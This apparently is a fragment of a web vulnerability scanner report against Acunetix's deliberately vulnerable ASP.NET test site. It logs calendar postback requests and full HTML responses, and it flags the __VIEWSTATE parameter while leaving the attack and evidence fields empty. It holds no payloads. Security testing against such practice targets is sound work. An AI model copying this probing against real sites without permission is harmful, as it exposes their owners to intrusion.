href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:White" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8133&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAhbnyGNoIZGRkM9cq59XqAXl1jUP5Q%2FFgfH%2FvHzk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK55%2BamAwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJzl7OO3KNsZQFZBeHIA8TMKzo4Y
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:12:47 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAAhbnyGNoIZGRkM9cq59XqAXl1jUP5Q/FgfH/vHzk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK55+amAwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJzl7OO3KNsZQFZBeHIA8TMKzo4Y" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:White" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8137&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAALGMXHNoIZGRkhf5xPrWP41bjIW90kwaD7Si6HmY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKRgIr3AwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDM8mcmbBkDRmte9AdoA7QyyAnrOw
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:24:26 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAALGMXHNoIZGRkhf5xPrWP41bjIW90kwaD7Si6HmY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKRgIr3AwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDM8mcmbBkDRmte9AdoA7QyyAnrOw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 